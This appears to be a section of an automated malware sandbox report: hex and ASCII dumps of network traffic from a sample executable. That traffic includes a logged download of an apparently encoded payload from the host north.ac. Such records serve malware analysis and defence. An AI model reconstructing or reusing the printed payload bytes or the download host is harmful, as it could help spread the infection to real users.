                                                                              Data Ascii: 8L9*X*50&]hd#36){FJnonAr)?I79.EZ|Y0kT=*2d[fXb4'Ky:`$+Qde|PY;o8C3~A]#&6I9Jsd1yHh
                                                                              2022-06-01 23:53:42 UTC1489INData Raw: 3b 67 28 69 07 54 e7 40 e6 69 07 78 10 38 e7 49 0a 68 07 43 37 fc 41 6a 06 16 69 07 2a 39 e7 1c 69 07 3d 5b 67 49 46 69 07 34 e7 0e 56 69 07 2f 5b e7 11 76 69 07 46 67 0a 86 69 07 a1 6b 67 0a 96 69 07 3e 37 67 3c 69 07 d2 5c 3c 67 19 69 07 4c e7 08 c6 69 07 80 6b 67 07 e6 69 07 20 3f 67 37 69 07 73 2f 67 10 06 0b 68 07 bf 67 13 16 0b 07 68 3a f6 36 fb 36 10 38 16 08 38 67 a0 6b 3b 70 3b 6b 3c 26 70 3c 06 46 0b 68 29 4a 39 06 4f 39 fe 39 03 39 01 3b 06 07 3c f7 3d fd 3d ad 3f 06 b2 3f 86 40 8b 40 ff 42 8e 04 42 79 e6 6a 06 56 0b 68 b5 06 7d 36 83 36 db 37 e1 37 26 8f 38 94 38 6f e6 bb 57 3a 06 5c 3a 00 3a 05 3a 0d 3c 06 12 3c c3 3c c8 3c fa 3e 06 ff 3e 76 41 7c 41 70 43 86 75 43 15 45 1a 45 bd 67 c3 0a 66 0b e8 8d 72 37 77 37 22 06 38 27 38 04 39 09 3a 4e
                                                                              Data Ascii: ;g(iT@ix8IhC7Aji*9i=[gIFi4Vi/[viFgikgi>7g<i\<giLikgi ?g7is/ghgh:6688gk;p;k<&p<Fh)J9O999;<==??@@BByjVh}6677&88oW:\:::<<<<>>vA|ApCuCEEgfr7w7"8'89:N
                                                                              2022-06-01 23:53:42 UTC1505INData Raw: 83 e2 1f 03 c2 c1 f8 05 8b d1 81 e2 1f 00 00 80 89 5d f0 89 45 f4 79 05 4a 83 ca e0 42 8d 7c 85 e0 6a 1f 33 c0 59 2b ca 40 d3 e0 89 4d f8 85 07 0f 84 8d 00 00 00 8b 45 f4 83 ca ff d3 e2 f7 d2 85 54 85 e0 eb 05 83 7c 85 e0 00 75 08 40 83 f8 03 7c f3 eb 6e 8b c6 99 6a 1f 59 23 d1 03 c2 c1 f8 05 81 e6 1f 00 00 80 79 05 4e 83 ce e0 46 83 65 fc 00 2b ce 33 d2 42 d3 e2 8d 4c 85 e0 8b 31 03 f2 89 75 08 8b 31 39 75 08 72 22 39 55 08 eb 1b 85 c9 74 2b 83 65 fc 00 8d 4c 85 e0 8b 11 8d 72 01 89 75 08 3b f2 72 05 83 fe 01 73 07 c7 45 fc 01 00 00 00 48 8b 55 08 89 11 8b 4d fc 79 d1 89 4d 08 8b 4d f8 83 c8 ff d3 e0 21 07 8b 45 f4 40 83 f8 03 7d 0d 6a 03 59 8d 7c 85 e0 2b c8 33 c0 f3 ab 83 7d 08 00 74 01 43 a1 04 d1 54 00 8b c8 2b 0d 08 d1 54 00 3b d9 7d 0d 33 c0 8d 7d
                                                                              Data Ascii: ]EyJB|j3Y+@MET|u@|njY#yNFe+3BL1u19ur"9Ut+eLru;rsEHUMyMM!E@}jY|+3}tCT+T;}3}
                                                                              2022-06-01 23:53:42 UTC1521INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 00 00 00 00 00 00 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                              Data Ascii: abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ
                                                                              2022-06-01 23:53:42 UTC1537INData Raw: c7 25 ca 10 23 df 94 5a 98 46 17 f2 83 5f 83 e6 5b 9f 0e 0c 3e 8e 1f ac e9 d3 3c 81 54 df df d1 11 37 1d c3 5f a8 0d 7c 86 98 b4 b9 2f 98 87 e4 31 ae b0 71 0d a3 3d 25 26 44 f0 9b f8 1d a0 53 7b 89 83 c5 12 8e 1b 92 10 b1 0d 64 ed b5 88 b4 a7 40 20 22 4a cc 3a a0 e8 0d d6 8a e0 9c 3e 74 ef 62 de 8a 94 0f 55 55 fc 81 47 9b 91 78 21 09 88 6a a0 65 2b 4b 96 15 53 61 65 ee 14 99 1b ee d9 53 8c 28 de 60 30 a3 9b 47 3d f5 1e f0 81 d1 fb 07 0e 0a bd 32 e3 a4 3a c8 51 42 f8 88 f9 c7 b3 b0 27 ce 48 59 34 80 f8 11 c5 b7 69 1a 66 5e ff f3 c9 06 01 35 ac 3e 71 bb de 69 bb fe bd de af 0b 9e 3f eb f9 f5 3e 1e e8 c1 52 18 a2 63 22 3e 0f 4b 6c 36 ad e4 13 94 48 18 07 d3 fd 70 f5 9e a6 db 32 36 ec 0f f4 b0 f7 9c c7 dc e8 e7 e7 dd 25 1d 7b d0 34 94 5b 68 d6 3b 05 f5 64 cd
                                                                              Data Ascii: %#ZF_[><T7_|/1q=%&DS{d@ "J:>tbUUGx!je+KSaeS(`0G=2:QB'HY4if^5>qi?>Rc">Kl6Hp26%{4[h;d
                                                                              2022-06-01 23:53:42 UTC1553INData Raw: 1a c4 ab 38 bc cf 57 8e 44 df 75 39 c3 51 c7 65 af f4 41 18 92 3f 42 8f a5 af cf 4a 9f d2 00 24 3f ae d1 c9 ea 06 3c 20 63 52 74 cc 27 c0 dc e5 1b f1 f8 76 4d 83 fa 98 c2 84 3a 0d d3 57 15 c3 a6 a9 bf e0 21 4b e9 7b fe e8 ac fb 4a 3e b1 18 89 87 23 fb 34 ee c1 0f 0a 31 73 bb 39 2d 4b 37 3b 5b 87 39 aa a7 20 ca 0d f1 13 b7 e7 43 de 5b d3 6c bb 86 24 50 1c 0c 44 b9 cd 62 9e bf 2e cb 17 e8 f9 9c 3c 2a cc 1e 3d 16 91 45 14 e3 fc fb 15 49 a8 bc 8c 39 cc f6 e0 82 02 86 69 6e f8 c2 4d 93 ef 96 6a 81 4a d2 13 54 e4 03 58 bf 16 f6 3e be 58 62 1a e2 43 86 46 c3 ce c4 67 09 9b 41 bd 92 8f 76 22 0d 0a e2 61 95 51 d0 ed e5 79 c7 e5 fe bf 29 7f 94 ef dd f2 46 f3 8e cf ad 0e 84 26 8d 5a ed f9 d5 e9 bd 39 87 8d eb 12 c1 d2 71 b9 b0 04 e8 8c e1 93 75 5a fe 0c b4 3c 1d 19
                                                                              Data Ascii: 8WDu9QeA?BJ$?< cRt'vM:W!K{J>#41s9-K7;[9 C[l$PDb.<*=EI9inMjJTX>XbCFgAv"aQy)F&Z9quZ<
                                                                              2022-06-01 23:53:42 UTC1569INData Raw: 0e ec b9 29 bf b6 c9 d5 3b a8 01 e2 e3 1e 20 2a 76 20 43 97 c6 bf 26 a6 65 3a 7b b1 4d 79 80 d1 36 68 67 a6 2d 6e 3b 47 30 cd d4 fe 35 8c f6 be 7f 7f b7 0c 58 6d 6c a0 42 a7 b4 14 a8 41 a7 d8 f0 a3 0d c7 08 06 7b d3 4a cf 8f 97 49 0f 8b 87 fc 1b f7 fa 47 40 e4 0f 2f bb b3 29 89 62 ae 8c 53 90 71 a1 e7 dc 3c 3f 54 93 96 0d 08 7a 62 90 02 2e b9 98 d8 98 7d e0 1b 80 e7 c2 b7 d9 29 b1 ad f4 8c 04 ee 27 40 63 12 a2 d1 53 89 2c 6c b9 69 1e de 63 1c f9 5f cc 00 5a 20 c4 75 6a f0 79 bb bd 69 01 b7 e6 ad f7 62 1c d2 44 ea 95 6d be 86 8f d3 c2 8e 49 7a 3f 0d 73 49 ae 8d d3 c7 1b 67 f1 70 2a 6e 88 b3 f7 a6 04 a1 79 8a 14 9f 83 ca 44 82 be de c2 06 23 cc 53 64 04 8d 32 20 fe 54 b7 9e e8 e9 db 3c f1 d3 37 d9 a2 6d 9a 37 8f 9b f7 e9 e8 d9 79 7e 7f 20 42 d0 c5 e0 ce db
                                                                              Data Ascii: ); *v C&e:{My6hg-n;G05XmlBA{JIG@/)bSq<?Tzb.})'@cS,lic_Z ujyibDmIz?sIgp*nyD#Sd2 T<7m7y~ B
                                                                              2022-06-01 23:53:42 UTC1585INData Raw: 00 00 bf bf bf 04 00 00 00 00 7f 7f 7f 02 00 00 00 00 7f 7f 7f 02 00 00 00 00 00 00 00 ff 00 00 00 ff c0 c0 c0 ff c0 c0 c0 ff c0 c0 c0 ff ff ff ff ff ff ff ff ff ff ff ff ff c0 c0 c0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff bc bf bf fd c0 c0 c0 ff fb fc fd fd fd fb fb fb ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff bd be be fd c0 c0 c0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff bc c0 bc ff c0 c0 c0 ff c0 c0 c0 ff c0 bd bf ff c0 c0 c0 ff c0 c0 c0 ff ff ff ff ff fd fe fc ff ff ff ff ff c0 c0 c0 ff c0 c0 c0 ff c0 c0 c0 ff bf bf bd fd c0 c0 c0 ff c0 c0 c0 ff c0 c0 c0 ff bb bc be fb c0 be bb fb 00 00 00 ff 00 00 00 ff 80 80 7e fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                              Data Ascii: ~
                                                                              2022-06-01 23:53:42 UTC1601INData Raw: 00 ff ea 41 41 ff b2 b2 b2 ff a4 a4 a4 ff bf bf bf ff b1 b1 7a ff cc cd 94 fe ea ea 41 ff bf bf bf fe c0 c0 c0 ff c0 c0 c0 ff 57 e0 e0 fe b9 d5 d5 ff be be bd fe 95 ce ce ff ab c7 c7 ff 80 d5 d5 ff c0 c0 c0 ff f8 f8 f8 ff ea ea ea ff f5 f4 f6 fd e1 e0 e0 fd d5 d5 d5 ff db dc db ff e3 e3 e3 ff fc fe fd fd db db db ff dc dc dc ff 00 00 00 ff 00 00 00 ff 00 00 00 39 00 00 00 00 00 00 00 00 00 00 00 00 aa aa aa 03 00 00 00 00 ff ff ff 01 7f 7f 7f 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 00 01 00 ff 95 95 95 ff b8 b8 80 ff ab ab 72 ff c0 c0 c0 ff a3 a3 a3 ff c7 c7 ab ff c0 c0 c0 ff be be bf fe 94 ce cd fd bf c0 bf ff ab c7 c7 ff 95 cd cd ff 81 d5 d5 ff 6a da da fe a9 c6 c6 fe bd
                                                                              Data Ascii: AAzAW9rj
                                                                              2022-06-01 23:53:42 UTC1617INData Raw: 00 00 c0 00 00 00 50 38 58 38 60 38 68 38 70 38 78 38 80 38 88 38 90 38 98 38 a0 38 a8 38 b0 38 b8 38 c0 38 c8 38 d0 38 d8 38 e0 38 e8 38 f0 38 f8 38 00 39 08 39 10 39 18 39 20 39 28 39 30 39 38 39 40 39 48 39 50 39 58 39 60 39 68 39 70 39 78 39 80 39 88 39 90 39 98 39 a0 39 a8 39 b0 39 b8 39 c0 39 c8 39 d0 39 d8 39 e0 39 e8 39 f0 39 f8 39 00 3a 08 3a 10 3a 18 3a 20 3a 28 3a 30 3a 38 3a 40 3a 48 3a 50 3a 58 3a 60 3a 68 3a 70 3a 78 3a 80 3a 88 3a 90 3a 98 3a a0 3a a8 3a b0 3a b8 3a c0 3a c8 3a d0 3a d8 3a e0 3a e8 3a f0 3a f8 3a 00 3b 08 3b c4 3b c8 3b cc 3b d0 3b 00 30 00 00 4c 01 00 00 08 33 0c 33 10 33 14 33 18 33 1c 33 20 33 24 33 28 33 2c 33 30 33 34 33 38 33 3c 33 40 33 44 33 48 33 4c 33 50 33 54 33 58 33 5c 33 60 33 64 33 68 33 6c 33 70 33 74 33 78
                                                                              Data Ascii: P8X8`8h8p8x888888888888888889999 9(90989@9H9P9X9`9h9p9x99999999999999999:::: :(:0:8:@:H:P:X:`:h:p:x:::::::::::::::::;;;;;;0L333333 3$3(3,3034383<3@3D3H3L3P3T3X3\3`3d3h3l3p3t3x


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              3192.168.2.449782172.67.152.230443C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              2022-06-01 23:53:55 UTC1632OUTGET /760 HTTP/1.1
                                                                              Host: north.ac
                                                                              Connection: Keep-Alive
                                                                              2022-06-01 23:53:56 UTC1632INHTTP/1.1 200 OK
                                                                              Date: Wed, 01 Jun 2022 23:53:56 GMT
                                                                              Content-Length: 194560
                                                                              Connection: close
                                                                              Last-Modified: Thu, 26 May 2022 04:23:16 GMT
                                                                              Accept-Ranges: bytes
                                                                              CF-Cache-Status: DYNAMIC
                                                                              Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5qfytIOe5sLD%2Fwl9gYzk58E9Fw4svHfvVEAnmoKBb2GQNLh3PNJ2dfK0hWDqJbvF473Vs9oG74D2O6ZrWYDws8pGaq5HxPESBkuf4TGyPz%2B08px9Ua6%2FS9tmsg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 714bdf1c5fa2769e-LHR
                                                                              alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                              2022-06-01 23:53:56 UTC1633INData Raw: 45 52 88 f8 fb f8 f8 f8 fc f8 f8 f8 f7 f7 f8 f8 b0 f8 f8 f8 f8 f8 f8 f8 38 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 78 f8 f8 f8 06 17 b2 06 f8 ac 01 c5 19 b0 f9 44 c5 19 4c 60 61 6b 18 68 6a 67 5f 6a 59 65 18 5b 59 66 66 67 6c 18 5a 5d 18 6a 6d 66 18 61 66 18 3c 47 4b 18 65 67 5c 5d 26 05 05 02 1c f8 f8 f8 f8 f8 f8 f8 48 3d f8 f8 44 f9 fb f8 8b f9 85 5a f8 f8 f8 f8 f8 f8 f8 f8 d8 f8 fa 19 03 f9 00 f8 f8 e8 fa f8 f8 fe f8 f8 f8 f8 f8 f8 ae 07 fb f8 f8 18 f8 f8 f8 18 fb f8 f8 f8 38 f8 f8 18 f8 f8 f8 fa f8 f8 fc f8 f8 f8 f8 f8 f8 f8 fc f8 f8 f8 f8 f8 f8 f8 f8 58 fb f8 f8 fa f8 f8 f8 f8 f8 f8 fb f8 38 7d f8 f8 08 f8 f8 08 f8 f8 f8 f8 08 f8 f8 08 f8 f8 f8 f8 f8 f8 08 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8
                                                                              Data Ascii: ER8xDL`akhjg_jYe[YffglZ]jmfaf<GKeg\]&H=DZ8X8}
                                                                              2022-06-01 23:53:56 UTC1633INData Raw: f8 fc 0e 24 07 1e 1e 78 3d f8 f8 fc 22 20 f9 f8 f8 02 23 cb 20 f9 f8 f8 02 23 e4 16 6b fb f8 f8 fe 1e 22 0b 28 fc f8 00 f9 f8 f8 f9 f8 f8 09 fa 20 7e f8 f8 02 17 3e 05 0a fb 20 7f f8 f8 02 02 17 56 03 1b f6 f7 f7 57 8a 93 1b b6 04 30 ae f8 f8 f8 1b f8 f8 f8 f8 f8 f8 f8 38 1b c5 c4 c4 c4 c4 c4 f8 38 20 80 f8 f8 02 04 ff ff 18 ba b5 fd f8 53 18 ba b5 fd f8 52 ff 59 50 03 ff ff 18 46 85 fe f8 53 18 46 85 fe f8 52 ff 59 50 03 0e 0b fc fe 6d 07 f8 f8 f9 20 81 f8 f8 02 ff f6 fa 0b 00 09 00 24 fd 0f 0b fc 23 fb 0e 0b fc 09 fc 0b 01 09 01 24 fb 17 58 03 10 85 4c f8 f8 f9 1d 0e ff 96 1d 0f 18 01 fa f8 f8 96 0b fd 6b 82 f8 f8 02 0b fe 09 fd 6d f9 f8 f8 13 09 fe 6c 2e f8 f8 f9 0e 10 67 4f f8 f8 02 8c 0b ff 23 00 ff 18 74 d0 03 f8 50 03 ff 64 1b f4 18 46 47 a7 5b 0c
                                                                              Data Ascii: $x=" # #k"( ~> VW088 SRYPFSFRYPm $#$XLkml.gO#tPdFG[
                                                                              2022-06-01 23:53:56 UTC1635INData Raw: 30 37 f7 f7 f7 20 d2 f8 f8 fe 30 4d f7 f7 f7 04 30 6d f7 f7 f7 f8 16 fa 20 7e f8 f8 02 22 3a 76 6c f8 f8 fc 20 de f8 f8 fe 78 f9 f8 f8 fc 22 f8 f8 f8 12 6b 87 f8 f8 02 72 f8 16 fa 20 7e f8 f8 02 22 16 fa 20 7e f8 f8 02 22 8a 76 74 f8 f8 fc 76 72 f8 f8 fc 76 70 f8 f8 fc 20 e1 f8 f8 fe 20 e4 f8 f8 fe 20 e7 f8 f8 fe 78 fa f8 f8 fc 22 f8 f8 f8 03 28 fc f8 23 f8 f8 f8 f8 f8 f8 f8 76 79 f8 f8 fc 6a 82 40 f8 68 fb 20 ea f8 f8 fe 78 fb f8 f8 fc fa fb fc 16 25 fd 1e 1e 1e d6 02 20 0f f8 f8 fe 23 ef 1e d6 f8 22 f8 f9 08 f8 f8 f8 f8 f8 f8 1f 1f f8 fb f9 f8 f8 f9 0b 28 00 f8 80 f8 f8 f8 ff f8 f8 09 12 85 07 f8 f8 f9 1d 0e 6a 86 40 f8 68 6a ea 40 f8 68 0f 1b 51 61 4a 02 ec 3b cf 38 0f 20 0e f8 f8 fe 9a 1d 0f 6a f2 40 f8 68 6a 62 41 f8 68 0f 1b 51 61 4a 02 ec 3b cf 38
                                                                              Data Ascii: 07 0M0m ~":vl x"kr ~" ~"vtvrvp x"(#vyj@h x% #"(j@hj@hQaJ;8 j@hjbAhQaJ;8
                                                                              2022-06-01 23:53:56 UTC1636INData Raw: f8 20 25 f8 f8 fe 20 0b f8 f8 fe 6a 44 43 f8 68 18 e0 fb f8 f8 20 25 f8 f8 fe 20 0b f8 f8 fe 58 0e 25 76 6a 60 43 f8 68 18 e0 fb f8 f8 20 25 f8 f8 fe 20 0b f8 f8 fe 58 6a 72 43 f8 68 18 e0 fb f8 f8 20 25 f8 f8 fe 20 0b f8 f8 fe 58 6a 82 43 f8 68 18 e0 fb f8 f8 20 25 f8 f8 fe 20 0b f8 f8 fe 58 6a 8c 43 f8 68 18 e0 fb f8 f8 20 25 f8 f8 fe 20 0b f8 f8 fe 58 6a 9c 43 f8 68 18 e0 fb f8 f8 20 25 f8 f8 fe 20 0b f8 f8 fe 58 6a ae 43 f8 68 18 e0 fb f8 f8 20 25 f8 f8 fe 20 0b f8 f8 fe 58 6a c0 43 f8 68 18 e0 fb f8 f8 20 25 f8 f8 fe 20 0c f8 f8 fe 58 13 24 8c 6a 10 44 f8 68 18 e0 fb f8 f8 20 25 f8 f8 fe 20 0c f8 f8 fe 58 76 5b f8 f8 fc 6a 54 44 f8 68 18 e0 fb f8 f8 20 25 f8 f8 fe 20 c0 f8 f8 fe 58 76 5b f8 f8 fc 6a 8e 44 f8 68 18 e0 fb f8 f8 20 25 f8 f8 fe 20 c0 f8
                                                                              Data Ascii: % jDCh % X%vj`Ch % XjrCh % XjCh % XjCh % XjCh % XjCh % XjCh % X$jDh % Xv[jTDh % Xv[jDh %
                                                                              2022-06-01 23:53:56 UTC1637INData Raw: 8a f8 f8 02 0d 32 08 f9 f8 f8 1e 15 24 55 76 a1 f8 f8 fc fa 6b 8a f8 f8 02 20 29 f9 f8 fe 76 a1 f8 f8 fc fb 6b 8a f8 f8 02 20 29 f9 f8 fe f6 f9 0e f6 f9 0e 31 df f8 f8 f8 1e 01 31 d0 f8 f8 f8 76 a8 f8 f8 fc 76 a5 f8 f8 fc fb 20 2c f9 f8 fe 6a a2 42 f8 68 6a 1c 42 f8 68 20 2f f9 f8 fe 20 14 f8 f8 fe 13 32 b4 f8 f8 f8 1e 09 fc 31 9e f8 f8 f8 76 7b f8 f8 fc 76 a8 f8 f8 fc 76 a5 f8 f8 fc fb 20 2c f9 f8 fe 6a a2 42 f8 68 6a 1c 42 f8 68 20 2f f9 f8 fe 20 ed f8 f8 fe 10 32 84 f8 f8 f8 1e 0e 0b fe 23 56 0e 25 b9 09 fd 6d fc f8 f8 13 09 fe 92 0b ff 76 4b f8 f8 fc 09 ff 6c 08 f8 f8 f9 20 a2 f8 f8 fe 76 4b f8 f8 fc 76 70 f8 f8 fc 20 e1 f8 f8 fe 20 a2 f8 f8 fe f6 f9 0e 1d 25 19 f6 f9 0b 00 09 00 24 0e 76 97 f8 f8 fc 09 ff 6d 08 f8 f8 f9 20 20 f9 f8 fe d6 fb 1e d6 f8
                                                                              Data Ascii: 2$Uvk )vk )11vv ,jBhjBh / 21v{vv ,jBhjBh / 2#V%mvKl vKvp %$vm
                                                                              2022-06-01 23:53:56 UTC1639INData Raw: 0a f8 f8 f9 14 25 08 1e 1e d6 0e 0b fc 23 c2 0b fd 23 c4 0b fe 23 d9 20 20 f9 f8 fe 23 e3 1e d6 f8 0e 31 34 f9 f8 f8 18 eb 1e 32 f9 0b ff 0a ff 20 7f f8 f8 02 03 18 99 b8 a9 2f 04 1b f8 f8 f8 98 70 26 c4 3a 05 0e 25 1b 30 cf f8 f8 f8 76 b9 f8 f8 fc 76 b8 f8 f8 fc 1b f8 f8 f8 f8 f8 f8 f8 38 20 47 f9 f8 fe 20 47 f9 f8 fe 05 00 0b 00 09 00 18 1c 80 fc f8 f6 f9 0b 01 09 01 24 00 09 00 0f 50 0b 00 23 fe 09 00 0f 51 0b 00 00 17 59 50 17 59 51 00 53 0b ff 0a ff 20 7f f8 f8 02 03 00 0b 02 09 02 18 83 42 ae 10 f6 f9 0b 03 09 03 24 00 09 02 0f 50 0b 02 23 fe 09 02 0f 51 0b 02 d6 fb 1e d6 f8 0e 0b 04 0f 24 23 23 21 76 79 f8 f8 fc ff 6d 07 f8 f8 f9 00 18 24 44 5c 12 53 00 59 0b ff 0a ff 20 7f f8 f8 02 20 ea f8 f8 fe 03 09 04 0f 50 0b 04 09 04 17 0d f6 fc 0b 05 09 05
                                                                              Data Ascii: %### #142 /p&:%0vv8 G G$P#QYPYQS B$P#Q$##!vym$D\SY P
                                                                              2022-06-01 23:53:56 UTC1640INData Raw: f6 fb 0e f6 f9 12 32 9f f8 f8 f8 1e 0e 25 72 fe 25 c0 0e 78 01 f8 f8 fc 23 73 76 02 f8 f8 fc 76 00 f8 f8 fc 76 01 f8 f8 fc 66 76 00 f8 f8 fc 86 61 62 55 cc 89 50 76 04 f8 f8 fc 76 01 f8 f8 fc 8d 0e 25 e9 13 24 e6 50 18 f7 f8 f8 f8 57 78 02 f8 f8 fc 76 04 f8 f8 fc 76 01 f8 f8 fc 8d 78 03 f8 f8 fc 76 04 f8 f8 fc 76 01 f8 f8 fc 76 04 f8 f8 fc 76 02 f8 f8 fc 8d 96 76 04 f8 f8 fc 76 02 f8 f8 fc 76 03 f8 f8 fc 96 76 01 f8 f8 fc 0f 50 78 01 f8 f8 fc 76 01 f8 f8 fc 18 f7 f8 f8 f8 1d 24 fb f6 fb 0e f6 f9 12 25 06 1e ff 32 61 f7 f7 f7 22 02 30 4c f7 f7 f7 03 23 e8 f8 f8 f8 13 28 fc f8 25 f9 f8 f8 00 f8 f8 09 6a 2e 47 f8 68 6a 56 47 f8 68 76 be f8 f8 fc 20 50 f9 f8 fe 20 32 f8 f8 fe 1e 6a 36 43 f8 68 18 e0 fb f8 f8 20 25 f8 f8 fe 20 0b f8 f8 fe 6a 44 43 f8 68 18 e0
                                                                              Data Ascii: 2%r%x#svvvfvabUPvv%$PWxvvxvvvvvvvvPxv$%2a"0L#(%j.GhjVGhv P 2j6Ch % jDCh
                                                                              2022-06-01 23:53:56 UTC1640INData Raw: fe 23 ec 1e d6 f8 fa fc 11 25 ff 1e 1e 16 24 ee d6 02 20 2b f8 f8 fe 23 ec 1e d6 f8 22 f8 f8 f8 f9 14 f8 f8 f8 f8 12 f8 f1 0b f9 fb f9 f8 f8 f9 f8 f8 0e f9 0b 21 f9 fb f9 f8 f8 f9 0b 28 00 f8 5f f9 f8 f8 0a f8 f8 09 76 9e f8 f8 fc 76 fe f8 f8 fc 6a 16 45 f8 68 20 23 f9 f8 fe 0f 32 1e f9 f8 f8 1e fe 31 be f8 f8 f8 76 9f f8 f8 fc 76 fa f8 f8 fc 76 65 f8 f8 fc 14 85 07 f8 f8 f9 1d 0e 76 80 f8 f8 fc 10 20 f9 f9 f8 fe 9a 1d 0f 6a 82 40 f8 68 9a 1d 10 76 fd f8 f8 fc 9a 1d 11 6a 82 40 f8 68 9a 1d 12 76 fd f8 f8 fc 9a 1d 13 6a a2 42 f8 68 9a 20 cc f8 f8 fe 20 23 f9 f8 fe 76 fa f8 f8 fc 76 fc f8 f8 fc 1d 25 fc 1e 0c 23 fd 67 1a f8 f8 02 76 fd f8 f8 fc 6a a2 42 f8 68 20 26 f8 f8 02 20 37 f8 f8 02 58 76 9f f8 f8 fc 76 fa f8 f8 fc 76 81 f8 f8 fc 76 80 f8 f8 fc 15 20
                                                                              Data Ascii: #%$ +#"!(_vvjEh #21vvvev j@hvj@hvjBh #vv%#gvjBh & 7Xvvvv
                                                                              2022-06-01 23:53:56 UTC1642INData Raw: 19 1e 0e 25 04 fe 86 0e 25 fb 0e f6 fb 0e 24 0d 1e ff 24 ff 0f 14 25 08 1e d6 13 0e 14 25 04 1e d6 0c 02 23 d5 03 23 e1 04 23 e6 04 23 ea 1e 10 24 fa 0e 04 d6 f8 00 22 f8 f8 f8 f9 08 f8 f8 f8 f8 f8 f8 47 47 f8 00 f9 f8 f8 f9 0b 28 fc f8 1f f8 f8 f8 ff f8 f8 09 17 0d 85 4b f8 f8 f9 1d c8 36 f8 f8 fc 12 25 05 1e 1e 12 25 07 1e fe 6d fa f8 f8 13 22 20 f9 f8 f8 02 23 e6 02 23 e7 f8 0b 28 fe f8 b3 f8 f8 f8 01 f8 f8 09 17 08 85 4b f8 f8 f9 1d c8 34 f8 f8 fc 12 32 8d f8 f8 f8 1e 1e 0e 31 8f f8 f8 f8 1e 17 01 85 07 f8 f8 f9 1d 0e 76 c4 f8 f8 fc 76 6f f8 f8 fc 20 de f8 f8 fe 20 34 f8 f8 fe 20 56 f9 f8 fe 9a 1d 0f 6a fe 48 f8 68 9a 1d 10 fb 9a 1d 11 6a 72 40 f8 68 9a 1d 12 76 fc f8 f8 fc 1d 25 fc 1e 0c 23 fd 67 1a f8 f8 02 9a 1d 13 fa 9a 1d 14 6a 04 48 f8 68 9a 1d
                                                                              Data Ascii: %%$$%%####$"GG(K6%%m" ##(K421vvo 4 VjHhjr@hv%#gjHh
                                                                              2022-06-01 23:53:56 UTC1643INData Raw: f8 fc 77 10 f8 f8 fc 73 12 f8 f8 fc 09 fd 09 04 18 f8 28 f8 f8 17 38 67 6c f8 f8 fe 0b 06 fd 25 ff 09 06 0e f6 f9 23 f9 0e 0b 07 0f 0b 08 09 07 0b 1c 09 1c 24 1b 0f 0b 08 76 0f f8 f8 fc 77 10 f8 f8 fc 73 12 f8 f8 fc 0e 09 04 18 f8 28 f8 f8 17 38 67 6c f8 f8 fe 0b 06 09 06 0e f6 f9 0b 09 09 09 0b 1d 09 1d 24 fe 6b 87 f8 f8 02 72 76 0e f8 f8 fc 77 10 f8 f8 fc 73 12 f8 f8 fc 09 06 fc 09 05 0a 01 67 68 f8 f8 fe 0e f6 f9 0b 0a 09 0a 0b 1e 09 1e 24 fe 6b 87 f8 f8 02 72 09 fc 18 f0 f8 f8 f8 ce 0b 0b fc 09 fc 14 ce 20 3b f8 f8 fe 0b 0c 09 0c 0f d2 0b 0d 0e 0b 1f 30 aa f8 f8 f8 fc 09 0b 17 04 ce 20 3a f8 f8 fe 0b 20 fc 09 0b 17 08 ce 20 3a f8 f8 fe 0b 21 fc 09 0b 17 0c ce 20 3a f8 f8 fe 0b 22 09 21 0e f6 fb 0b 23 09 23 0b 24 09 24 24 61 09 21 0f d2 0f ce 85 4b f8
                                                                              Data Ascii: ws(8gl%#$vws(8gl$krvwsgh$kr ;0 : :! :"!##$$$a!K
